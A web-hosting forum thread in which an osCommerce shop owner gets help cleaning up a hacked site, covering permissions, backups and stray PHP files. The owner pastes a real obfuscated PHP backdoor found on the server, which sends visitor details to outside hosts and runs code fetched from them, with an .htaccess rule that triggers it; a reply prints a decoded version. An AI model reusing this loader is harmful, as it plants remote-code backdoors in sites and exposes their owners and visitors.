Site getting Hacked

[Forestshopkeeper]

My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read.

Thanks

Jim

[php_Guy]

My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read.

Thanks

Jim

 

Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel.

 

Also be sure to install these mods

 

That should take care of the problem.

[germ]

Your images folder still has hack PHP files in it (looks to me like).

 

If it's set at 777 permissions, there's probably your weak point.

 

Folder permissions should not be higher than 755.

 

File permissions probably not higher than 644.

[php_Guy]

After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.

[Forestshopkeeper]

Your images folder still has hack PHP files in it (looks to me like).

 

If it's set at 777 permissions, there's probably your weak point.

 

Folder permissions should not be higher than 755.

 

File permissions probably not higher than 644.

Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referenceing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.

Jim

[Forestshopkeeper]

Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel.

 

Also be sure to install these mods

 

That should take care of the problem.

Thanks. I am working on the mods. I set the folders at 755. files are 644

Jim

[Forestshopkeeper]

After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.

Thanks for the info.

Jim

[Forestshopkeeper]

Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referenceing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.

Jim

Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777

Jim

[Forestshopkeeper]

Thanks. I am working on the mods. I set the folders at 755. files are 644

Jim

Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777

Jim

[Forestshopkeeper]

Thanks. I am working on the mods. I set the folders at 755. files are 644

Jim

is there any particular order to put in these mods? Do I need all of them? Are there any known conflicts between them?

Jim

[♥Vger]

If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755.

 

Either that or get your hosting company to sort out their security.

 

Vger

[Forestshopkeeper]

If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755.

 

Either that or get your hosting company to sort out their security.

 

Vger

That makes sense for now till I can sort it out

Jim

[germ]

Recheck your images folder for hack PHP files:

 

 019667.php			  23-May-2008 22:30	 1k  
1019667.php			 24-Aug-2008 01:55	 1k  
19667.php			   20-Mar-2008 02:59	 1k

[php_Guy]

I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755

 

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php

 

Good luck

[Forestshopkeeper]

Recheck your images folder for hack PHP files:

 

 019667.php			  23-May-2008 22:30	 1k  
1019667.php			 24-Aug-2008 01:55	 1k  
19667.php			   20-Mar-2008 02:59	 1k

Thanks. I don't know where they came from, but they are gone now.

Jim

[germ]

They look like the same type of hacked that got me last March.

 

If so, It's not a destructive nor information stealing type of hack.

 

It's a "pay per click" scam.

 

They stick these bogus PHP files around, then seed search engines with links to them, then just set back and rake in the dough (so I've been told).

 

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.

 

Just be sure all the folder permission are no higher than 755 and keep an eye on things for a while.

 

If no more hack files show up, you should be OK.

 

By the way, better check your admin folder too, especially your backups folder for your database.

 

They got me there, too.

:blush:

[Forestshopkeeper]

I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755

 

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php

 

Good luck

I am looking at some .htaccess files in my admin folder:

 

This script is in a file called 220009.php

 

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>

 

This is what is in the .htaccess file in my backups folder

 

Options -MultiViews

ErrorDocument 404 //admin/backups/220009.php

 

 

In 2007 I did not even have a backups folder, and now I send everything to my computer. I am pulling these files for now and setting the permissions to 755 on these folders.

 

What else can I do?

Jim

[germ]

Both of the files you posted about in the backups folder are bad. Delete them.

[Forestshopkeeper]

Both of the files you posted about in the backups folder are bad. Delete them.

Thanks.

I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today.

Jim

[Forestshopkeeper]

Thanks.

I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today.

Jim

Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder.

Jim

[Forestshopkeeper]

Both of the files you posted about in the backups folder are bad. Delete them.

Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder.

Jim

[germ]

I can't tell you what it does because the main payload(s) rely on something from another server.

 

All I can do is make it easier to read (reformatted, decoded, commented, and simplified as much as possible):

 

<? error_reporting(0);
$s="e";
// get info about this site/page/server
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// encode it
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ("http://a.rsdcraft.ws/?".$str);
else if ("http://ad.runweb.info/?".$str);
else eval("http://7.xmldata.info/?".$str);
?>

[php_Guy]

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.

no no.. I would not delete and reinstall. It would be easier to manually inspect every file in every folder.

 

I was suggesting that he delete everything and re-install his last backup. And preferably, that backup should be a set of working files that have never actually resided on the webspace.

 

IMO, everyone should modify files locally and then upload them to their server and occasionally make a copy of those local files and set them aside as a snapshot just for this sort of thing. That way, you can delete the entire site and reload a current set of files. It should take less than half an hour even on a slow connection.

 

Unfortunately, some people modify the files live on the server and don't have local files. Those that do backup, (ie - download a full set of files from the server) have a backup of files that could have been infected.